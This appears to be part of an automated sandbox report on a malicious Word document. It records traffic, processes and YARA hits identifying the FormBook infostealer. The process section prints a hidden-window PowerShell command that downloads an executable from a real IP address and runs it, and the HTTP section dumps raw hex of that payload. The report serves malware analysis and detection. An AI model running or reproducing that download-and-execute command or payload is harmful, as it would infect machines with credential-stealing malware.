Jun 11, 2021 07:41:54.228905916 CEST	80	49728	31.210.20.45	192.168.2.3
Jun 11, 2021 07:41:54.229274988 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:54.229370117 CEST	49728	80	192.168.2.3	31.210.20.45
Jun 11, 2021 07:41:54.280366898 CEST	80	49728	31.210.20.45	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 11, 2021 07:41:10.832798004 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:10.883836031 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:11.722973108 CEST	60152	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:11.775981903 CEST	53	60152	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:12.809017897 CEST	57544	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:12.860456944 CEST	53	57544	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:13.750332117 CEST	55984	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:13.800266027 CEST	53	55984	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:14.985160112 CEST	64185	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:15.035154104 CEST	53	64185	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:15.960246086 CEST	65110	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:16.014609098 CEST	53	65110	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:16.748366117 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:16.854274035 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:17.449394941 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:17.527631998 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:18.488331079 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:18.551199913 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:19.488365889 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:19.574156046 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:20.700575113 CEST	60831	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:20.753508091 CEST	53	60831	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:21.535720110 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:21.597326994 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:21.631319046 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:21.684258938 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:23.403966904 CEST	53195	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:23.462760925 CEST	53	53195	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:24.403342009 CEST	50141	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:24.454746008 CEST	53	50141	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:25.485156059 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:25.544076920 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:25.582359076 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:25.645179033 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:26.562211990 CEST	49563	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:26.612839937 CEST	53	49563	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:27.554721117 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:27.605020046 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:28.463372946 CEST	59349	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:28.515290022 CEST	53	59349	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:30.122205973 CEST	57084	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:30.182354927 CEST	53	57084	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:33.636338949 CEST	58823	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:33.688656092 CEST	53	58823	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:34.515969038 CEST	57568	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:34.566216946 CEST	53	57568	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:40.811451912 CEST	50540	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:40.873195887 CEST	53	50540	8.8.8.8	192.168.2.3
Jun 11, 2021 07:41:47.167042017 CEST	54366	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:41:47.246959925 CEST	53	54366	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:04.075032949 CEST	53034	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:04.137747049 CEST	53	53034	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:17.913352966 CEST	57762	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:18.078919888 CEST	53	57762	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:18.707071066 CEST	55435	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:18.765530109 CEST	53	55435	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:19.405277014 CEST	50713	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:19.468416929 CEST	53	50713	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:19.917454958 CEST	56132	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:19.977097034 CEST	53	56132	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:20.581916094 CEST	58987	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:20.646002054 CEST	53	58987	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:21.296673059 CEST	56579	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:21.348766088 CEST	53	56579	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:22.093786955 CEST	60633	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:22.144459963 CEST	53	60633	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:23.241625071 CEST	61292	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:23.294504881 CEST	53	61292	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:24.207333088 CEST	63619	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:24.269033909 CEST	53	63619	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:24.719552040 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:24.780714035 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:37.837280989 CEST	61946	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:37.904129028 CEST	53	61946	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:42.347331047 CEST	64910	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:42.411797047 CEST	53	64910	8.8.8.8	192.168.2.3
Jun 11, 2021 07:43:16.409578085 CEST	52123	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:43:16.481569052 CEST	53	52123	8.8.8.8	192.168.2.3
Jun 11, 2021 07:43:17.797094107 CEST	56130	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:43:17.856029987 CEST	53	56130	8.8.8.8	192.168.2.3

HTTP Request Dependency Graph

31.210.20.45

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49728	31.210.20.45	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 07:41:48.573122978 CEST	1158	OUT	HEAD /1xBet/RFL_0769002.exe HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: 31.210.20.45
Jun 11, 2021 07:41:48.625103951 CEST	1158	IN	HTTP/1.1 200 OK Date: Fri, 11 Jun 2021 05:41:48 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 Last-Modified: Thu, 10 Jun 2021 08:59:35 GMT ETag: "823f0-5c4659c35de2e" Accept-Ranges: bytes Content-Length: 533488 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload
Jun 11, 2021 07:41:48.669747114 CEST	1158	OUT	GET /1xBet/RFL_0769002.exe HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Thu, 10 Jun 2021 08:59:35 GMT User-Agent: Microsoft BITS/7.8 Host: 31.210.20.45
Jun 11, 2021 07:41:48.725075006 CEST	1160	IN	HTTP/1.1 200 OK Date: Fri, 11 Jun 2021 05:41:48 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 Last-Modified: Thu, 10 Jun 2021 08:59:35 GMT ETag: "823f0-5c4659c35de2e" Accept-Ranges: bytes Content-Length: 533488 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5e 07 69 d6 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 b0 07 00 00 4a 00 00 00 00 00 00 de cf 07 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 cf 07 00 53 00 00 00 00 e0 07 00 e8 46 00 00 00 00 00 00 00 00 00 00 00 fc 07 00 f0 27 00 00 00 40 08 00 0c 00 00 00 6c cf 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 af 07 00 00 20 00 00 00 b0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 46 00 00 00 e0 07 00 00 48 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 fa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 cf 07 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 b0 07 00 8c 1e 00 00 03 00 00 00 26 00 00 06 f8 2a 00 00 e8 85 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 31 00 00 06 2a 92 02 28 01 00 00 0a 28 02 00 00 0a 02 fe 06 03 00 00 06 73 03 00 00 0a 6f 04 00 00 0a 02 03 7d 01 00 00 04 2a 1b 30 02 00 46 00 00 00 01 00 00 11 28 05 00 00 0a 72 01 00 00 70 6f 06 00 00 0a 0a 73 07 00 00 0a 0b 06 07 6f 08 00 00 0a 28 02 00 00 0a 07 6f 09 00 00 0a 6f 0a 00 00 0a 0c de 14 07 2c 06 07 6f 0b 00 00 0a dc 06 2c 06 06 6f 0b 00 00 0a dc 08 2a 00 00 01 1c 00 00 02 00 16 00 1a 30 00 0a 00 00 00 00 02 00 10 00 2a 3a 00 0a 00 00 00 00 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 00 13 30 02 00 27 00 00 00 02 00 00 11 1f 16 0a 2b 0e 20 e8 03 00 00 28 0c 00 00 0a 06 17 59 0a 06 2d ef 73 0d 00 00 0a 6f 0e 00 00 0a 02 7b 01 00 00 04 2a 06 2a 1e 02 28 01 00 00 0a 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 3e 02 16 28 0e 00 00 06 02 16 28 10 00 00 06 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 3e 02 16 28 13 00 00 06 02 16 28 15 00 00 06 2a 1e 02 28 13 30 02 00 62 00 00 00 03 00 00 11 17 73 02 00 00 06 0a 17 73 02 00 00 06 0b 72 39 00 00 70 06 6f 06 00 00 06 8c 0d 00 00 01 28 10 00 00 0a 28 11 00 00 0a 72 5d 00 00 70 07 6f 06 00 00 06 8c 0d 00 00 01 28 10 00 00 0a 28 11 00 00 0a 18 28 05 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL^i0J @ `@SF'@l H.text `.rsrcFH@@.reloc@@BH&(1((so}0F(rposo(oo,o,o0:~0'+ (Y-so{({"}{"}>(({"}{"}>(((0bssr9po((r]po(((
Jun 11, 2021 07:41:48.725127935 CEST	1161	IN	Data Raw: 00 00 06 72 81 00 00 70 28 04 00 00 06 8c 0d 00 00 01 28 10 00 00 0a 28 11 00 00 0a 2a 00 00 1b 30 0a 00 da 04 00 00 04 00 00 11 72 ab 00 00 70 28 13 00 00 0a 74 11 00 00 01 0a 06 72 ff 00 00 70 6f 14 00 00 0a 06 72 3f 01 00 70 6f 15 00 00 0a 06 Data Ascii: rp(((*0rp(trpor?poosrIp%%%%%(oo,ootoso(+~-/rp( %(!("(#
Jun 11, 2021 07:41:48.725167990 CEST	1162	IN	Data Raw: 00 00 00 00 00 00 00 00 00 d6 04 00 00 d6 04 00 00 03 00 00 00 27 00 00 01 42 02 2d 06 72 78 02 00 70 2a 02 6f 2e 00 00 0a 2a 00 00 00 13 30 03 00 5a 00 00 00 05 00 00 11 28 02 00 00 0a 6f 2f 00 00 0a 0a 16 0b 2b 43 06 07 9a 0c 08 6f 30 00 00 0a Data Ascii: 'B-rxpo.0Z(o/+Co0o1o1(2, o3((o3(((2,Xi20& @,+o4io5%-*0\(rzpo6,>os
Jun 11, 2021 07:41:48.725207090 CEST	1164	IN	Data Raw: 29 91 24 78 3c a6 2d 95 4a 58 a9 08 57 94 2f e3 9c 3c 32 80 7d 10 97 6e 23 3a 8d be 18 f1 96 46 5d 5b 37 13 0e d7 f8 34 e0 a5 5a da 16 a5 cb 01 6f ce 4a 57 b7 d5 47 d0 07 21 18 e6 b6 2b 0d 2b e6 8f 0b 73 69 f5 4c 3f ee 7f 49 15 74 07 89 d1 8b fc Data Ascii: )$x<-JXW/<2}n#:F][74ZoJWG!++siL?ItRH~Sw/2G\|+),qCoH9;].,mRv^brd.5HGAA1Ot.X#^`[8N`)].$*hp9=_BQz(0wz&j
Jun 11, 2021 07:41:48.775830030 CEST	1165	IN	Data Raw: 3b 06 e4 32 6f 4c 19 7c 06 39 13 bd 49 1a d0 11 f6 8e 2f 73 60 9b c6 9b 27 51 44 f4 bb 11 49 66 fc 94 c8 b1 1f 15 55 45 2c bc f5 20 1e 17 12 87 aa 70 2b 09 61 1c 1d 74 0f fc c4 e0 41 13 76 a1 6c b4 21 e1 c9 81 46 5a 54 8c eb f3 3e 05 0b 07 94 26 Data Ascii: ;2oL\|9I/s`'QDIfUE, p+atAvl!FZT>&)Wd]mQ-""^jLh]_(z5X2^B'!,^J)F37\^4jO_d\!Cxv7d^\|5_jQd
Jun 11, 2021 07:41:48.775949001 CEST	1167	IN	Data Raw: 19 d3 64 a8 58 6e ae 76 de 52 ed bc b5 da 79 5b b5 f3 f6 6a e7 c7 aa 9d 5b e1 3c 53 9c d7 64 94 1b 28 62 09 bc 03 3f 6b c0 cf b5 e2 bc 99 fc 20 ce 0e 03 ce 94 95 29 35 0b f7 4e f2 28 c6 84 7b 17 4c 61 e6 ac f6 c1 e6 46 ab 60 4f ee 85 54 96 49 6c Data Ascii: dXnvRy[j[<Sd(b?k )5N({LaF`OTIl\k21)b?MTEpbJ**f}lmi3RYfv/k9\;[Kqr5$%!'t<,dLdk< U{KSQ63
Jun 11, 2021 07:41:48.776024103 CEST	1168	IN	Data Raw: 7e 40 f6 23 ad 23 ec ec fc f4 e4 5f 43 86 95 6e 0d bb 8b 28 32 b3 fc 11 1f 35 67 7a 3f 24 33 bd 28 0a b5 f4 47 00 99 b6 f6 ca 1e af 20 92 55 ef c7 ec c8 9e 28 a1 b9 92 68 2f 85 45 c7 54 28 97 61 b9 6c 19 9f 45 1e 10 cf e9 98 28 2c 48 a7 ac 7c a7 Data Ascii: ~@##_Cn(25gz?$3(G U(h/ET(alE(,H\|-S04Q{$2#OOck54eg6Dk(m-Xi-&V{M#.)um'e)+<GpIuzFT%;\|4s:>aorWpQX
Jun 11, 2021 07:41:48.776088953 CEST	1169	IN	Data Raw: 8f a2 ba 74 95 06 f3 83 76 4f 29 45 79 5d ea cb bb a2 3c df 26 36 38 5a 53 b2 29 1b d7 4b f4 e3 fd 15 12 89 54 dc 34 b1 7b be bd d3 8c 46 9c a4 29 19 b3 82 72 21 a7 e5 42 83 fa 30 c9 78 b1 21 17 47 2f 0e d8 f3 1b 5b 48 56 ed 05 a1 60 55 84 c2 8b Data Ascii: tvO)Ey]<&68ZS)KT4{F)r!B0x!G/[HV`UJ((z^"PB"[^dPkf\9/\\|/{U>`+mi1>Qyw8/i1eY"^I1g>ku9_9lB)
Jun 11, 2021 07:41:48.776206017 CEST	1171	IN	Data Raw: 4c db 09 8f f5 86 aa 37 77 5d a0 b8 bf 50 99 e5 37 97 8a b2 4c c5 05 2a 15 17 fa a9 28 4d 97 8a 85 21 bd 66 f8 a6 d3 51 90 b2 d8 e4 6d 1d 39 9e 43 ba 0e d3 3d a4 49 99 ae 4d 35 e3 22 6a a6 5d 09 b1 09 d0 88 e3 52 83 cd c7 6c 67 f0 09 19 ef f4 e1 Data Ascii: L7w]P7L*(M!fQm9C=IM5"j]Rlg";GND,6fy-hHl?!ci_NP#Spol:b tOacaO\r9;]2={l0VS8d7q'v2y6sNX}'8oW8
Jun 11, 2021 07:41:48.776279926 CEST	1172	IN	Data Raw: 41 66 bf 1c 07 9b b2 b8 9b 4c 59 ca 0d d8 db ef 17 58 93 2a 23 82 06 72 bb 29 2c f3 97 a0 e1 4a 4e a9 fc 89 98 8d 36 a7 4d a5 88 dc 0e 73 ec f3 5a 90 bc 16 e6 06 78 25 a5 bf 4d 82 1d e6 76 d0 a1 4a fd 03 dd 0c b1 27 d8 72 2f d7 13 4e 61 ef 1d b0 Data Ascii: AfLYX#r),JN6MsZx%MvJ'r/Na.>a2a/".j"1G8pg/6j16>""RT?8(ZE0cro._2MR(+D3(M_CnMR[nXKLjZDqf}
Jun 11, 2021 07:41:48.776391983 CEST	1174	IN	Data Raw: 4d 6e 05 8e 9b b7 b0 87 4e f2 18 49 eb c0 92 59 46 91 20 b7 80 2a 11 99 f8 a5 2c da 40 82 1b a2 20 aa 03 0e 1c 24 43 31 90 89 a7 ac 68 7a 51 5b 30 47 92 56 3a 3a 43 04 49 8b 63 c8 f7 44 a7 cf c5 e8 ae 72 31 ca b9 28 75 fd 75 7e 39 fe 0e 35 11 cb Data Ascii: MnNIYF ,@ $C1hzQ[0GV::CIcDr1(uu~95\KneBF311I1'rFStH9"AQ[\F0YQ.Dq"#qxlCx,~ENJc%3h&]S5ntCrqF}>3X

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3664 Parent PID: 792

General

Start time:	07:41:14
Start date:	11/06/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Imagebase:	0xd0000
File size:	1937688 bytes
MD5 hash:	0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 4220 Parent PID: 3664

General

Start time:	07:41:20
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe
Imagebase:	0x1010000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3492 Parent PID: 4220

General

Start time:	07:41:21
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: nothinglittle.exe PID: 6988 Parent PID: 4220

General

Start time:	07:41:50
Start date:	11/06/2021
Path:	C:\Users\Public\Documents\nothinglittle.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Documents\nothinglittle.exe
Imagebase:	0xd10000
File size:	533488 bytes
MD5 hash:	3C88C6EF1A906BC81FC6B5B7FC478E0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000000.275702172.0000000000D12000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.432793873.0000000000D12000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000003.430227602.0000000001416000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: nothinglittle.exe PID: 6172 Parent PID: 6988

General

Start time:	07:43:04
Start date:	11/06/2021
Path:	C:\Users\user\AppData\Local\Temp\nothinglittle.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\nothinglittle.exe
Imagebase:	0x7d0000
File size:	533488 bytes
MD5 hash:	3C88C6EF1A906BC81FC6B5B7FC478E0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001C.00000000.431614413.00000000007D2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001C.00000002.491282271.00000000007D2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001C.00000000.432322254.00000000007D2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 26%, Metadefender, Browse Detection: 55%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 6172

General

Start time:	07:43:06
Start date:	11/06/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Module1

Declaration

Line	Content
1	Attribute VB_Name = "Module1"

Non-Executed Functions

Subroutine physicaldark, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
2	Sub physicaldark()
7	End Sub

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
